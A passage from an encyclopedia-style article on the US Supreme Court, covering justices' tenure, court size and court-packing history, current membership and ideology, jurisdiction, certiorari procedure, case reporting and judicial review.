of their lives, until death; furthermore, the phrase is generally interpreted to mean that the only way justices can be removed from office is by Congress via the impeachment process. The Framers of the Constitution chose good behavior tenure to limit the power to remove justices and to ensure judicial independence. 108 109 110 No constitutional mechanism exists for removing a justice who is permanently incapacitated by illness or injury, but unable (or unwilling) to resign. 111 The only justice ever to be impeached was Samuel Chase, in 1804. The House of Representatives adopted eight articles of impeachment against him; however, he was acquitted by the Senate, and remained in office until his death in 1811. 112 Two justices, William O. Douglas and Abe Fortas were subjected to hearings from the Judiciary Committee, with Douglas being the subject of hearings twice, in 1953 and again in 1970 and Fortas resigned while hearings were being organized in 1969. On July 10, 2024, Representative Alexandria Ocasia-Cortez filed Articles of Impeachment against justices Clarence Thomas and Samuel Alito, citing their "widely documented financial and personal entanglements. 113 Because justices have indefinite tenure, timing of vacancies can be unpredictable. Sometimes they arise in quick succession, as in September 1971, when Hugo Black and John Marshall Harlan II left within days of each other, the shortest period of time between vacancies in the court's history. 114 Sometimes a great length of time passes between vacancies, such as the 11 year span, from 1994 to 2005, from the retirement of Harry Blackmun to the death of William Rehnquist, which was the second longest timespan between vacancies in the court's history. 115 On average a new justice joins the court about every two years. 116 Despite the variability, all but four presidents have been able to appoint at least one justice. William Henry Harrison died a month after taking office, although his successor (John Tyler) made an appointment during that presidential term. Likewise, Zachary Taylor died 16 months after taking office, but his successor (Millard Fillmore) also made a Supreme Court nomination before the end of that term. Andrew Johnson, who became president after the assassination of Abraham Lincoln, was denied the opportunity to appoint a justice by a reduction in the size of the court. Jimmy Carter is the only person elected president to have left office after at least one full term without having the opportunity to appoint a justice. Presidents James Monroe, Franklin D. Roosevelt, and George W. Bush each served a full term without an opportunity to appoint a justice, but made appointments during their subsequent terms in office. No president who has served more than one full term has gone without at least one opportunity to make an appointment. One of the smallest Supreme Courts in the world, the US Supreme Court consists of nine members: one chief justice and eight associate justices. The U.S. Constitution does not specify the size of the Supreme Court, nor does it specify any specific positions for the court's members. The Constitution assumes the existence of the office of the chief justice, because it mentions in Article I, Section 3, Clause 6 that "the Chief Justice" must preside over impeachment trials of the President of the United States. The power to define the Supreme Court's size and membership has been assumed to belong to Congress, which initially established a six-member Supreme Court composed of a chief justice and five associate justices through the Judiciary Act of 1789. The size of the court was first altered by the Midnight Judges Act of 1801 which would have reduced the size of the court to five members upon its next vacancy (as federal judges have life tenure), but the Judiciary Act of 1802 promptly negated the 1801 act, restoring the court's size to six members before any such vacancy occurred. As the nation's boundaries grew across the continent and as Supreme Court justices in those days had to ride the circuit, an arduous process requiring long travel on horseback or carriage over harsh terrain that resulted in months-long extended stays away from home, Congress added justices to correspond with the growth such that the number of seats for associate justices plus the chief justice became seven in 1807, nine in 1837, and ten in 1863. 117 118 At the behest of Chief Justice Chase, and in an attempt by the Republican Congress to limit the power of Democrat Andrew Johnson, Congress passed the Judicial Circuits Act of 1866, providing that the next three justices to retire would not be replaced, which would thin the bench to seven justices by attrition. Consequently, one seat was removed in 1866 and a second in 1867. Soon after Johnson left office, the new president Ulysses S. Grant, 119 a Republican, signed into law the Judiciary Act of 1869. This returned the number of justices to nine 120 (where it has since remained), and allowed Grant to immediately appoint two more judges. President Franklin D. Roosevelt attempted to expand the court in 1937. His proposal envisioned the appointment of one additional justice for each incumbent justice who reached the age of 70 years 6 months and refused retirement, up to a maximum bench of 15 justices. The proposal was ostensibly to ease the burden of the docket on elderly judges, but the actual purpose was widely understood as an effort to "pack" the court with justices who would support Roosevelt's New Deal. 121 The plan, usually called the "court-packing plan", failed in Congress after members of Roosevelt's own Democratic Party believed it to be unconstitutional. It was defeated 70 20 in the Senate, and the Senate Judiciary Committee reported that it was "essential to the continuance of our constitutional democracy" that the proposal "be so emphatically rejected that its parallel will never again be presented to the free representatives of the free people of America. 122 123 124 125 The expansion of a 5 4 conservative majority to a 6 3 supermajority during the presidency of Donald Trump led to analysts calling the court the most conservative since the 1930s as well as calls for an expansion in the court's size to fix what some saw as an imbalance, with Republicans having appointed 14 of the 18 justices immediately preceding Amy Coney Barrett. 126 127 In April 2021, during the 117th Congress, some Democrats in the House of Representatives introduced the Judiciary Act of 2021, a bill to expand the Supreme Court from nine to 13 seats. It met divided views within the party, and Speaker of the House Nancy Pelosi did not bring it to the floor for a vote. 128 129 Shortly after taking office in January 2021, President Joe Biden established a presidential commission to study possible reforms to the Supreme Court. The commission's December 2021 final report discussed but took no position on expanding the size of the court. 130 At nine members, the U.S. Supreme Court is one of the smallest supreme courts in the world. David Litt argues the court is too small to represent the perspectives of a country the United States' size. 131 Lawyer and legal scholar Jonathan Turley advocates for 19 justices, with the court being gradually expanded by two new members per presidential term, bringing the U.S. Supreme Court to a similar size as its counterparts in other developed countries. He says that a bigger court would reduce the power of the swing justice, ensure the court has "a greater diversity of views", and make confirmation of new justices less politically contentious. 132 133 There are currently nine justices on the Supreme Court: Chief Justice John Roberts and eight associate justices. Among the current members of the court, Clarence Thomas is the longest-serving justice, with a tenure of 11,987 days (32 years, 299 days) as of August 17, 2024; the most recent justice to join the court is Ketanji Brown Jackson, whose tenure began on June 30, 2022, after being confirmed by the Senate on April 7. 134 This graphical timeline depicts the length of each current Supreme Court justice's tenure (not seniority, as the chief justice has seniority over all associate justices regardless of tenure) on the court: The court currently has five male and four female justices. Among the nine justices, there are two African American justices (Justices Thomas and Jackson) and one Hispanic justice (Justice Sotomayor). One of the justices was born to at least one immigrant parent: Justice Alito's father was born in Italy. 136 137 At least six justices are Roman Catholics, one is Jewish, and one is Protestant. It is unclear whether Neil Gorsuch considers himself a Catholic or an Episcopalian. 138 Historically, most justices have been Protestants, including 36 Episcopalians, 19 Presbyterians, 10 Unitarians, 5 Methodists, and 3 Baptists. 139 140 The first Catholic justice was Roger Taney in 1836, 141 and 1916 saw the appointment of the first Jewish justice, Louis Brandeis. 142 In recent years the historical situation has reversed, as most recent justices have been either Catholic or Jewish. Three justices are from the state of New York, two are from Washington, D.C., and one each is from New Jersey, Georgia, Colorado, and Louisiana. 143 144 145 Eight of the current justices received their Juris Doctor from an Ivy League law school: Neil Gorsuch, Ketanji Brown Jackson, Elena Kagan and John Roberts from Harvard; plus Samuel Alito, Brett Kavanaugh, Sonia Sotomayor and Clarence Thomas from Yale. Only Amy Coney Barrett did not; she received her Juris Doctor at Notre Dame. Previous positions or offices, judicial or federal government, prior to joining the court (by order of seniority following the Chief Justice) include: For much of the court's history, every justice was a man of Northwestern European descent, and almost always Protestant. Diversity concerns focused on geography, to represent all regions of the country, rather than religious, ethnic, or gender diversity. 146 Racial, ethnic, and gender diversity in the court increased in the late 20th century. Thurgood Marshall became the first African-American justice in 1967. 142 Sandra Day O'Connor became the first female justice in 1981. 142 In 1986, Antonin Scalia became the first Italian-American justice. Marshall was succeeded by African-American Clarence Thomas in 1991. 147 O'Connor was joined by Ruth Bader Ginsburg, the first Jewish woman on the Court, in 1993. 148 After O'Connor's retirement Ginsburg was joined in 2009 by Sonia Sotomayor, the first Hispanic and Latina justice, 142 and in 2010 by Elena Kagan. 148 After Ginsburg's death on September 18, 2020, Amy Coney Barrett was confirmed as the fifth woman in the court's history on October 26, 2020. Ketanji Brown Jackson is the sixth woman and first African-American woman on the court. There have been six foreign-born justices in the court's history: James Wilson (1789 1798), born in Caskardy, Scotland; James Iredell (1790 1799), born in Lewes, England; William Paterson (1793 1806), born in County Antrim, Ireland; David Brewer (1889 1910), born to American missionaries in Smyrna, Ottoman Empire (now zmir, Turkey); George Sutherland (1922 1939), born in Buckinghamshire, England; and Felix Frankfurter (1939 1962), born in Vienna, Austria-Hungary (now in Austria). 142 Since 1789, about one-third of the justices have been U.S. military veterans. Samuel Alito is the only veteran currently serving on the court. 149 Retired justices Stephen Breyer and Anthony Kennedy also served in the U.S. military. 150 Justices are nominated by the president in power, and receive confirmation by the Senate, historically holding many of the views of the nominating president's political party. While justices do not represent or receive official endorsements from political parties, as is accepted practice in the legislative and executive branches, organizations such as the Federalist Society do officially filter and endorse judges that have a sufficiently conservative view of the law. Jurists are often informally categorized in the media as being conservatives or liberal. Attempts to quantify the ideologies of jurists include the Segal Cover score, Martin-Quinn score, and Judicial Common Space score. 151 152 Devins and Baum argue that before 2010, the Court never had clear ideological blocs that fell perfectly along party lines. In choosing their appointments, Presidents often focused more on friendship and political connections than on ideology. Republican presidents sometimes appointed liberals and Democratic presidents sometimes appointed conservatives. As a result, ... between 1790 and early 2010 there were only two decisions that the Guide to the U.S. Supreme Court designated as important and that had at least two dissenting votes in which the Justices divided along party lines, about one-half of one percent. 153 : 316 154 Even in the turbulent 1960s and 1970s, Democratic and Republican elites tended to agree on some major issues, especially concerning civil rights and civil liberties—and so did the justices. But since 1991, they argue, ideology has been much more important in choosing justices—all Republican appointees have been committed conservatives and all Democratic appointees have been liberals. 153 : 331 344 As the more moderate Republican justices retired, the court has become more partisan. The Court became more divided sharply along partisan lines with justices appointed by Republican presidents taking increasingly conservative positions and those appointed by Democrats taking moderate liberal positions. 153 : 357 Following the confirmation of Amy Coney Barrett in 2020 after the death of Ruth Bader Ginsburg, the court is composed of six justices appointed by Republican presidents and three appointed by Democratic presidents. It is popularly accepted that Chief Justice Roberts and associate justices Thomas, Alito, Gorsuch, Kavanaugh, and Barrett, appointed by Republican presidents, compose the court's conservative wing, and that Justices Sotomayor, Kagan, and Jackson, appointed by Democratic presidents, compose the court's liberal wing. 155 Prior to Justice Ginsburg's death in 2020, the conservative Chief Justice Roberts was sometimes described as the court's 'median justice' (with four justices more liberal and four more conservative than he is). 156 157 Darragh Roche argues that Kavanaugh as 2021's median justice exemplifies the rightward shift in the court. 158 needs update FiveThirtyEight found the number of unanimous decisions dropped from the 20 year average of nearly 50% to nearly 30% in 2021 while party-line rulings increased from a 60 year average just above zero to a record high 21%. 159 That year Ryan Williams pointed to the party-line votes for confirmations of justices as evidence that the court is of partisan importance to the Senate. 160 In 2022, Simon Lazarus of Brookings critiqued the U.S. Supreme Court as an increasingly partisan institution. 161 A 2024 AP-NORC poll showed 7 in 10 respondents believed the court decides cases to "fit their own ideologies" as opposed to "acting as an independent check on other branches of government by being fair and impartial. 162 There are currently three living retired justices of the Supreme Court of the United States: Anthony Kennedy, David Souter, and Stephen Breyer. As retired justices, they no longer participate in the work of the Supreme Court, but may be designated for temporary assignments to sit on lower federal courts, usually the United States Courts of Appeals. Such assignments are formally made by the chief justice, on request of the chief judge of the lower court and with the consent of the retired justice. In recent years, Justice Souter has frequently sat on the First Circuit, the court of which he was briefly a member before joining the Supreme Court. 163 The status of a retired justice is analogous to that of a circuit or district court judge who has taken senior status, and eligibility of a Supreme Court justice to assume retired status (rather than simply resign from the bench) is governed by the same age and service criteria. In recent times, justices tend to strategically plan their decisions to leave the bench with personal, institutional, ideological, partisan, and political factors playing a role. 164 165 The fear of mental decline and death often motivates justices to step down. The desire to maximize the court's strength and legitimacy through one retirement at a time, when the court is in recess and during non-presidential election years suggests a concern for institutional health. Finally, especially in recent decades, many justices have timed their departure to coincide with a philosophically compatible president holding office, to ensure that a like-minded successor would be appointed. 166 167 As of 2024, associate justices receive a yearly salary of $298,500 and the chief justice is paid $312,200 per year. 168 Once a justice meets age and service requirements, the justice may retire with a pension based on the same formula used for federal employees. As with other federal courts judges, their pension can never be less than their salary at the time of retirement according to the Compensation Clause of Article III of the Constitution. citation needed For the most part, the day-to-day activities of the justices are governed by rules of protocol based upon the seniority of justices. The chief justice always ranks first in the order of precedence—regardless of the length of their service. The associate justices are then ranked by the length of their service. The chief justice sits in the center on the bench, or at the head of the table during conferences. The other justices are seated in order of seniority. The senior-most associate justice sits immediately to the chief justice's right; the second most senior sits immediately to their left. The seats alternate right to left in order of seniority, with the most junior justice occupying the last seat. Therefore, since the October 2022 term, the court sits as follows from left to right, from the perspective of those facing the court: Barrett, Gorsuch, Sotomayor, Thomas (most senior associate justice), Roberts (chief justice), Alito, Kagan, Kavanaugh, and Jackson. Likewise, when the members of the court gather for official group photographs, justices are arranged in order of seniority, with the five most senior members seated in the front row in the same order as they would sit during Court sessions (currently, from left to right, Sotomayor, Thomas, Roberts, Alito, and Kagan), and the four most junior justices standing behind them, again in the same order as they would sit during Court sessions (Barrett, Gorsuch, Kavanaugh, and Jackson). In the justices' private conferences, current practice is for them to speak and vote in order of seniority, beginning with the chief justice first and ending with the most junior associate justice. By custom, the most junior associate justice in these conferences is charged with any menial tasks the justices may require as they convene alone, such as answering the door of their conference room, serving beverages and transmitting orders of the court to the clerk. 169 The Supreme Court first met on February 1, 1790, at the Merchants' Exchange Building in New York City. When Philadelphia became the capital, the court met briefly in Independence Hall before settling in Old City Hall from 1791 until 1800. After the government moved to Washington, D.C., the court occupied various spaces in the Capitol building until 1935, when it moved into its own purpose-built home. The four-story building was designed by Cass Gilbert in a classical style sympathetic to the surrounding buildings of the Capitol and Library of Congress, and is clad in marble. The building includes the courtroom, justices' chambers, an extensive law library, various meeting spaces, and auxiliary services including a gymnasium. The Supreme Court building is within the ambit of the Architect of the Capitol, but maintains its own Supreme Court Police, separate from the Capitol Police. 170 Located across First Street from the United States Capitol at One First Street NE and Maryland Avenue, 171 172 the building is open to the public from 9 am to 4:30 pm weekdays but closed on weekends and holidays. 171 Visitors may not tour the actual courtroom unaccompanied. There is a cafeteria, a gift shop, exhibits, and a half-hour informational film. 170 When the court is not in session, lectures about the courtroom are held hourly from 9:30 am to 3:30 pm and reservations are not necessary. 170 When the court is in session the public may attend oral arguments, which are held twice each morning (and sometimes afternoons) on Mondays, Tuesdays, and Wednesdays in two-week intervals from October through late April, with breaks during December and February. Visitors are seated on a first-come first-served basis. One estimate is there are about 250 seats available. 173 The number of open seats varies from case to case; for important cases, some visitors arrive the day before and wait through the night. The court releases opinions beginning at 10 am on scheduled "non-argument days" (also called opinion days) 174 These sessions, which typically last 15 to 30 minute, are also open to the public. 174 170 From mid-May until the end of June, at least one opinion day is scheduled each week. 170 Supreme Court Police are available to answer questions. 171 Congress is authorized by Article III of the federal Constitution to regulate the Supreme Court's appellate jurisdiction. The Supreme Court has original and exclusive jurisdiction over cases between two or more states 175 but may decline to hear such cases. 176 It also possesses original but not exclusive jurisdiction to hear "all actions or proceedings to which ambassadors, other public ministers, consuls, or vice consuls of foreign states are parties; all controversies between the United States and a State; and all actions or proceedings by a State against the citizens of another State or against aliens. 177 In 1906, the court asserted its original jurisdiction to prosecute individuals for contempt of court in United States v. Shipp. 178 The resulting proceeding remains the only contempt proceeding and only criminal trial in the court's history. 179 180 The contempt proceeding arose from the lynching of Ed Johnson in Chattanooga, Tennessee the evening after Justice John Marshall Harlan granted Johnson a stay of execution to allow his lawyers to file an appeal. Johnson was removed from his jail cell by a lynch mob, aided by the local sheriff who left the prison virtually unguarded, and hanged from a bridge, after which a deputy sheriff pinned a note on Johnson's body reading: "To Justice Harlan. Come get your nigger now. 179 The local sheriff, John Shipp, cited the Supreme Court's intervention as the rationale for the lynching. The court appointed its deputy clerk as special master to preside over the trial in Chattanooga with closing arguments made in Washington before the Supreme Court justices, who found nine individuals guilty of contempt, sentencing three to 90 days in jail and the rest to 60 days in jail. 179 180 181 In all other cases, the court has only appellate jurisdiction, including the ability to issue writs of mandamus and writs of prohibition to lower courts. It considers cases based on its original jurisdiction very rarely; almost all cases are brought to the Supreme Court on appeal. In practice, the only original jurisdiction cases heard by the court are disputes between two or more states. 182 The court's appellate jurisdiction consists of appeals from federal courts of appeal (through certiorari, certiorari before judgment, and certified questions), 183 the United States Court of Appeals for the Armed Forces (through certiorari), 184 the Supreme Court of Puerto Rico (through certiorari), 185 the Supreme Court of the Virgin Islands (through certiorari), 186 the District of Columbia Court of Appeals (through certiorari), 187 and "final judgments or decrees rendered by the highest court of a State in which a decision could be had" (through certiorari). 187 In the last case, an appeal may be made to the Supreme Court from a lower state court if the state's highest court declined to hear an appeal or lacks jurisdiction to hear an appeal. For example, a decision rendered by one of the Florida District Courts of Appeal can be appealed to the U.S. Supreme Court if (a) the Supreme Court of Florida declined to grant certiorari, e.g. Florida Star v. B. J. F., or (b) the district court of appeal issued a per curiam decision simply affirming the lower court's decision without discussing the merits of the case, since the Supreme Court of Florida lacks jurisdiction to hear appeals of such decisions. 188 The power of the Supreme Court to consider appeals from state courts, rather than just federal courts, was created by the Judiciary Act of 1789 and upheld early in the court's history, by its rulings in Martin v. Hunter's Lessee (1816) and Cohens v. Virginia (1821). The Supreme Court is the only federal court that has jurisdiction over direct appeals from state court decisions, although there are several devices that permit so-called "collateral review" of state cases. It has to be noted that this "collateral review" often only applies to individuals on death row and not through the regular judicial system. 189 Since Article Three of the United States Constitution stipulates that federal courts may only entertain "cases" or "controversies", the Supreme Court cannot decide cases that are moot and it does not render advisory opinions, as the supreme courts of some states may do. For example, in DeFunis v. Odegaard (1974), the court dismissed a lawsuit challenging the constitutionality of a law school affirmative action policy because the plaintiff student had graduated since he began the lawsuit, and a decision from the court on his claim would not be able to redress any injury he had suffered. However, the court recognizes some circumstances where it is appropriate to hear a case that is seemingly moot. If an issue is "capable of repetition yet evading review", the court would address it even though the party before the court would not themselves be made whole by a favorable result. In Roe v. Wade (1973), and other abortion cases, the court addresses the merits of claims pressed by pregnant women seeking abortions even if they are no longer pregnant because it takes longer than the typical human gestation period to appeal a case through the lower courts to the Supreme Court. Another mootness exception is voluntary cessation of unlawful conduct, in which the court considers the probability of recurrence and plaintiff's need for relief. 190 The United States is divided into thirteen circuit courts of appeals, each of which is assigned a "circuit justice" from the Supreme Court. Although this concept has been in continuous existence throughout the history of the republic, its meaning has changed through time. Under the Judiciary Act of 1789, each justice was required to "ride circuit", or to travel within the assigned circuit and consider cases alongside local judges. This practice encountered opposition from many justices, who cited the difficulty of travel. Moreover, there was a potential for a conflict of interest on the court if a justice had previously decided the same case while riding circuit. Circuit riding ended in 1901, when the Circuit Court of Appeals Act was passed, and circuit riding was officially abolished by Congress in 1911. 191 The circuit justice for each circuit is responsible for dealing with certain types of applications that, by law and the rules of the court, may be addressed by a single justice. Ordinarily, a justice will resolve such an application by simply endorsing it "granted" or "denied" or entering a standard form of order; however, the justice may elect to write an opinion, referred to as an in-chambers opinion. Congress has specifically authorized one justice to issue a stay pending certiorari in 28 U.S.C. 2101(f) inappropriate external link? . Each justice also decides routine procedural requests, such as for extensions of time. Before 1990, the rules of the Supreme Court also stated that "a writ of injunction may be granted by any Justice in a case where it might be granted by the Court. 192 However, this part of the rule (and all other specific mention of injunctions) was removed in the Supreme Court's rules revision of December 1989. 193 194 Nevertheless, requests for injunctions under the All Writs Act are sometimes directed to the circuit justice. In the past, when? circuit justices also sometimes granted motions for bail in criminal cases, writs of habeas corpus, and applications for writs of error granting permission to appeal. 195 A circuit justice may sit as a judge on the Court of Appeals of that circuit, but over the past hundred years, this has rarely occurred. A circuit justice sitting with the Court of Appeals has seniority over the chief judge of the circuit. 196 The chief justice has traditionally been assigned to the District of Columbia Circuit, the Fourth Circuit (which includes Maryland and Virginia, the states surrounding the District of Columbia), and since it was established, the Federal Circuit. Each associate justice is assigned to one or two judicial circuits. As of September 28, 2022, the allotment of the justices among the circuits is as follows: 197 Five of the current justices are assigned to circuits on which they previously sat as circuit judges: Chief Justice Roberts (D.C. Circuit), Justice Sotomayor (Second Circuit), Justice Alito (Third Circuit), Justice Barrett (Seventh Circuit), and Justice Gorsuch (Tenth Circuit). Nearly all cases come before the court by way of petitions for writs of certiorari, commonly referred to as cert, upon which the court grants a writ of certiorari. The court may review via this process any civil or criminal case in the federal courts of appeals. 198 It may also review by certiorari a final judgment of the highest court of a state if the judgment involves a question of federal statutory or constitutional law. 199 A case may alternatively come before the court as a direct appeal from a three-judge federal district court. 200 The party that petitions the court for review is the petitioner and the non-mover is the respondent. Case names before the court are styled petitioner v. respondent, regardless of which party initiated the lawsuit in the trial court. For example, criminal prosecutions are brought in the name of the state and against an individual, as in State of Arizona v. Ernesto Miranda. If the defendant is convicted, and his conviction then is affirmed on appeal in the state supreme court, when he petitions for cert the name of the case becomes Miranda v. Arizona. The court also hears questions submitted to it by appeals courts themselves via a process known as certification. 198 The Supreme Court relies on the record assembled by lower courts for the facts of a case and deals solely with the question of how the law applies to the facts presented. There are however situations where the court has original jurisdiction, such as when two states have a dispute against each other, or when there is a dispute between the United States and a state. In such instances, a case is filed with the Supreme Court directly. Examples of such cases include United States v. Texas, a case to determine whether a parcel of land belonged to the United States or to Texas, and Virginia v. Tennessee, a case turning on whether an incorrectly drawn boundary between two states can be changed by a state court, and whether the setting of the correct boundary requires Congressional approval. Although it has not happened since 1794 in the case of Georgia v. Brailsford, 201 parties in an action at law in which the Supreme Court has original jurisdiction may request that a jury determine issues of fact. 202 Georgia v. Brailsford remains the only case in which the court has empaneled a jury, in this case a special jury. 203 Two other original jurisdiction cases involve colonial era borders and rights under navigable waters in New Jersey v. Delaware, and water rights between riparian states upstream of navigable waters in Kansas v. Colorado. A cert petition is voted on at a session of the court called conference. A conference is a private meeting of the nine justices by themselves; the public and the justices' clerks are excluded. The rule of four permits four of the nine justices to grant a writ of certiorari. If it is granted, the case proceeds to the briefing stage; otherwise, the case ends. Except in death penalty cases and other cases in which the court orders briefing from the respondent, the respondent may, but is not required to, file a response to the cert petition. The court grants a petition for cert only for "compelling reasons", spelled out in the court's Rule 10. Such reasons include: When a conflict of interpretations arises from differing interpretations of the same law or constitutional provision issued by different federal circuit courts of appeals, lawyers call this situation a "circuit split"; if the court votes to deny a cert petition, as it does in the vast majority of such petitions that come before it, it does so typically without comment. A denial of a cert petition is not a judgment on the merits of a case, and the decision of the lower court stands as the case's final ruling. To manage the high volume of cert petitions received by the court each year (of the more than 7,000 petitions the court receives each year, it will usually request briefing and hear oral argument in 100 or fewer), the court employs an internal case management tool known as the "cert pool"; currently, all justices except for Justices Alito and Gorsuch participate in the cert pool. 204 205 206 207 The Court also relies on and cites amicus briefs, law review articles, and other written works for their decisions. While law review article use has increased slightly with one article cited per decision on average, 208 the use of amicus briefs has increased significantly. 209 The use of amicus briefs has received criticism, including the ability of authors to discuss topics outside their expertise (unlike in lower courts), 209 with documented examples of falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 The lack of funding transparency and the lack of a requirement to submit them earlier in the process also make it more difficult to fact-check and understand the credibility of amicus briefs. 209 When the court grants a cert petition, the case is set for oral argument. Both parties will file briefs on the merits of the case, as distinct from the reasons they may have argued for granting or denying the cert petition. With the consent of the parties or approval of the court, amici curiae, or "friends of the court", may also file briefs. The court holds two-week oral argument sessions each month from October through April. Each side has thirty minutes to present its argument (the court may choose to give more time, although this is rare), 211 and during that time, the justices may interrupt the advocate and ask questions. In 2019, the court adopted a rule generally allowing advocates to speak uninterrupted for the first two minutes of their argument. 212 The petitioner gives the first presentation, and may reserve some time to rebut the respondent's arguments after the respondent has concluded. Amici curiae may also present oral argument on behalf of one party if that party agrees. The court advises counsel to assume that the justices are familiar with and have read the briefs filed in a case. At the conclusion of oral argument, the case is submitted for decision. Cases are decided by majority vote of the justices. After the oral argument is concluded, usually in the same week as the case was submitted, the justices retire to another conference at which the preliminary votes are tallied and the court sees which side has prevailed. One of the justices in the majority is then assigned to write the court's opinion, also known as the "majority opinion", an assignment made by the most senior justice in the majority, with the chief justice always being considered the most senior. Drafts of the court's opinion circulate among the justices until the court is prepared to announce the judgment in a particular case. 213 Justices are free to change their votes on a case up until the decision is finalized and published. In any given case, a justice is free to choose whether or not to author an opinion or else simply join the majority or another justice's opinion. There are several primary types of opinions: It is the court's practice to issue decisions in all cases argued in a particular term by the end of that term. Within that term, the court is under no obligation to release a decision within any set time after oral argument. Since recording devices are banned inside the courtroom of the Supreme Court Building, the delivery of the decision to the media has historically been done via paper copies in what was known as the "Running of the Interns". 214 However, this practice has become pass as the Court now posts electronic copies of the opinions on its website as they are being announced. 215 It is possible that through recusals or vacancies the court divides evenly on a case. If that occurs, then the decision of the court below is affirmed, but does not establish binding precedent. In effect, it results in a return to the status quo ante. For a case to be heard, there must be a quorum of at least six justices. 216 If a quorum is not available to hear a case and a majority of qualified justices believes that the case cannot be heard and determined in the next term, then the judgment of the court below is affirmed as if the court had been evenly divided. For cases brought to the Supreme Court by direct appeal from a United States District Court, the chief justice may order the case remanded to the appropriate U.S. Court of Appeals for a final decision there. 217 This has only occurred once in U.S. history, in the case of United States v. Alcoa (1945). 218 The court's opinions are published in three stages. First, a slip opinion is made available on the court's web site and through other outlets. Next, several opinions and lists of the court's orders are bound together in paperback form, called a preliminary print of United States Reports, the official series of books in which the final version of the court's opinions appears. About a year after the preliminary prints are issued, a final bound volume of U.S. Reports is issued by the Reporter of Decisions. The individual volumes of U.S. Reports are numbered so that users may cite this set of reports (or a competing version published by another commercial legal publisher but containing parallel citations) to allow those who read their pleadings and other briefs to find the cases quickly and easily. As of January 2019 update , there are: As of March 2012 update , the U.S. Reports have published a total of 30,161 Supreme Court opinions, covering the decisions handed down from February 1790 to March 2012. citation needed This figure does not reflect the number of cases the court has taken up, as several cases can be addressed by a single opinion (see, for example, Parents v. Seattle, where Meredith v. Jefferson County Board of Education was also decided in the same opinion; by a similar logic, Miranda v. Arizona actually decided not only Miranda but also three other cases: Vignera v. New York, Westover v. United States, and California v. Stewart). A more unusual example is The Telephone Cases, which are a single set of interlinked opinions that take up the entire 126th volume of the U.S. Reports. Opinions are also collected and published in two unofficial, parallel reporters: Supreme Court Reporter, published by West (now a part of Thomson Reuters), and United States Supreme Court Reports, Lawyers' Edition (simply known as Lawyers' Edition), published by LexisNexis. In court documents, legal periodicals and other legal media, case citations generally contain cites from each of the three reporters; for example, citation to Citizens United v. Federal Election Commission is presented as Citizens United v. Federal Election Com'n, 585 U.S. 50, 130 S. Ct. 876, 175 L. Ed. 2d 753 (2010), with "S. Ct. representing the Supreme Court Reporter, and "L. Ed. representing the Lawyers' Edition. 222 223 Lawyers use an abbreviated format to cite cases, in the form "vol U.S. page, pin (year) , where vol is the volume number, page is the page number on which the opinion begins, and year is the year in which the case was decided. Optionally, pin is used to "pinpoint" to a specific page number within the opinion. For instance, the citation for Roe v. Wade is 410 U.S. 113 (1973), which means the case was decided in 1973 and appears on page 113 of volume 410 of U.S. Reports. For opinions or orders that have not yet been published in the preliminary print, the volume and page numbers may be replaced with In order to plead before the court, an attorney must first be admitted to the court's bar. Approximately 4,000 lawyers join the bar each year. The bar contains an estimated 230,000 members. In reality, pleading is limited to several hundred attorneys. citation needed The rest join for a one-time fee of $200, with the court collecting about $750,000 annually. Attorneys can be admitted as either individuals or as groups. The group admission is held before the current justices of the Supreme Court, wherein the chief justice approves a motion to admit the new attorneys. 224 Lawyers commonly apply for the cosmetic value of a certificate to display in their office or on their resume. They also receive access to better seating if they wish to attend an oral argument. 225 Members of the Supreme Court Bar are also granted access to the collections of the Supreme Court Library. 226 A term of the Supreme Court commences on the first Monday of each October, and continues until June or early July of the following year. Each term consists of alternating periods of around two weeks known as "sittings" and "recesses"; justices hear cases and deliver rulings during sittings, and discuss cases and write opinions during recesses. 227 The federal court system and the judicial authority to interpret the Constitution received little attention in the debates over the drafting and ratification of the Constitution. The power of judicial review, in fact, is nowhere mentioned in it. Over the ensuing years, the question of whether the power of judicial review was even intended by the drafters of the Constitution was quickly frustrated by the lack of evidence bearing on the question either way. 228 Nevertheless, the power of judiciary to overturn laws and executive actions it determines are unlawful or unconstitutional is a well-established precedent. Many of the Founding Fathers accepted the notion of judicial review; in Federalist No. 78, Alexander Hamilton wrote: "A Constitution is, in fact, and must be regarded by the judges, as a fundamental law. It therefore belongs to them to ascertain its meaning, and the meaning of any particular act proceeding from the legislative body. If there should happen to be an irreconcilable variance between the two, that which has the superior obligation and validity ought, of course, to be preferred; or, in other words, the Constitution ought to be preferred to the statute. The Supreme Court established its own power to declare laws unconstitutional in Marbury v. Madison (1803), consummating the American system of checks and balances. In explaining the power of judicial review, Chief Justice John Marshall stated that the authority to interpret the law was the particular province of the courts, part of the duty of the judicial department to say what the law is. His contention was not that the court had privileged insight into constitutional requirements, but that it was the constitutional duty of the judiciary, as well as the other branches of government, to read and obey the dictates of the Constitution. 228 This decision was criticized by then-President Thomas Jefferson who said, "the Constitution, on this hypothesis, is a mere thing of wax in the hands of the judiciary, which they may twist and shape into any form they please. 229 Since the founding of the republic, there has been a tension between the practice of judicial review and the democratic ideals of egalitarianism, self-government, self-determination and freedom of conscience. At one pole are those who view the federal judiciary and especially the Supreme Court as being "the most separated and least checked of all branches of government. 230 Indeed, federal judges and justices on the Supreme Court are not required to stand for election by virtue of their tenure "during good behavior", and their pay may "not be diminished" while they hold their position (Section 1 of Article Three). Although subject to the process of impeachment, only one justice has ever been impeached and no Supreme Court justice has been removed from office. At the other pole are those who view the judiciary as the least dangerous branch, with little ability to resist the exhortations of the other branches of government. 228 The Supreme Court cannot directly enforce its rulings; instead, it relies on respect for the Constitution and for the law for adherence to its judgments. One notable instance of nonacquiescence came in 1832, when the state of Georgia ignored the Supreme Court's decision in Worcester v. Georgia. President Andrew Jackson, who sided with the Georgia courts, is supposed to have remarked, "John Marshall has made his decision; now let him enforce it 231 Some state governments in the South also resisted the desegregation of public schools after the 1954 judgment Brown v. Board of Education. More recently, many feared that President Nixon would refuse to comply with the court's order in United States v. Nixon (1974) to surrender the Watergate tapes. 232 Nixon ultimately complied with the Supreme Court's ruling. 233 Supreme Court decisions can be purposefully overturned by constitutional amendment, something that has happened on six occasions: 234 When the court rules on matters involving the interpretation of laws rather than of the Constitution, simple legislative action can reverse the decisions (for example, in 2009 Congress passed the Lilly Ledbetter Fair Pay Act of 2009, superseding the limitations given in Ledbetter v. Goodyear Tire Rubber Co. in 2007). Also, the Supreme Court is not immune from political and institutional consideration: lower federal courts and state courts sometimes resist doctrinal innovations, as do law enforcement officials. 235 In addition, the other two branches can restrain the court through other mechanisms. Congress can increase the number of justices, giving the president power to influence future decisions by appointments (as in Roosevelt's 